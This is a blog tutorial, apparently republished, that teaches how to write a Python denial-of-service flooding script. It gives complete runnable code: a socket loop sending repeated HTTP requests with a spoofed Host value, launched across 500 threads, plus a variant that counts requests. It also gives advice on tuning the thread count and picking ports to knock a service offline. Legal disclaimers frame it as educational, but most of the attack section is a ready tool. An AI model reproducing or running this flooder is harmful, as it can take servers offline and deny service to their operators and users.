Originally published at neuralnine.com

In this tutorial we are going to write a penetration-testing script, namely a DDOS script, in Python. This program will allow us to flood a server with so many reqeusts that, after a while, it won’t be able to respond anymore and it will go down.

But let me give you a big warning here! Performing a DDOS attack onto any server that is not yours or you don’t have permission to attack is highly illegal. I do not recommend the attacks on any servers other than your own and I am not responsible for what you are going to do with this script. This post is purely educational and shall help you to understand networking and programming with Python. So don’t do stupid things!

What is DDOS?

DDOS stands for _Distributed Denial of Service _and it is an attack where we block the ressources of a server by flooding it with requests. Usually this kind of attack is never performed alone but with the help of so-called botnets.

In a botnet, one hacker infects many computers and servers of ordinary people, in order to use them as _zombies. _He uses them for a collective attack onto a server. Instead of one DDOS script, he can now run thousands of them. Sooner or later the server will be overwhelmed with the amount of requests so that it is not even able to respond to an ordinary user. For smaller and weaker servers, sometimes one attacker is enough to get it down. However, usually such an attack can be counteracted by blocking the IP-addresses of the attackers.

Implementing The DDOS Script

The implentation of a DDOS script in Python is quite simple. We only need to send requests to a host on a specific port over and over again. This can be done with sockets. To speed the process up and make it more effective, we will use multi-threading as well. So, the following libraries will be needed for this tutorial:

import socket
import threading

Now the first thing we need are the target’s IP-address, the port we want to attack and our fake IP-address that we want to use. Notice that this kind of “fake” IP-address does not really conceal who you are. It doesn’t make you anonymous.

target = '10.0.0.138'
fake_ip = '182.21.20.32'
port = 80

As I already mentioned, DDOS is illegal. So be careful witht the target that you choose here. In this case, I chose the IP-address of my router at home. You can also choose your home server, your printer or maybe even your own website. If you don’t know your IP-address, you can use your command line and ping the domain to get it. As a fake IP-address I chose a random but still valid address. Last but not least, I decided to attack the port 80, which is HTTP. If you want to shut down a specific service, you need to know which port it is operating at. Check out this link, for a detailed list. The next thing we need to do is to implement the actual attacking function.

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()

This attack function is the function that will be running in each of our individual threads. It starts an endless loop, within which it creates a socket, connects to the target and sends an HTTP request over and over again. Of course, if you are attacking another port, you will also have to change the type of request you send.

Here you can see that we are injecting our fake IP-address into the request. The request itself needs to be encoded into bytes, so that it can be sent to the server. At the end of every iteration, we close our socket.

Now the last thing that we need to do is to run multiple threads that execute this function at the same time. If we would just run the function, it would send a lot of requests over and over again but it would always be only one after the other. By using multi-threading, we can send many requests at once.

for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()

In this case, we are starting 500 threads that will execute our function. Of course, you can play around with the number. Maybe 30 or 50 are already sufficient. When we now execute our script, we will DDOS the target but we won’t see anything. If you want to see some information, you may print the amounts of requests already sent. Just notice that this will slow down your attack.

attack_num = 0

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))

        global attack_num
        attack_num += 1
        print(attack_num)

        s.close()

We created a variable _attack_num _that tracks how many requests have been sent already. With every iteration, we increase this number and print it.

That’s it for this tutorial! I really hope you learned something! Just don’t do stupid or illegal things with this knowledge! If you want to tell me something or ask questions, feel free to leave a comment! Check out my instagram page or the other parts of this website, if you are interested in more! Stay tuned!

#python

Coding A DDOS Script in Python
95.25 GEEK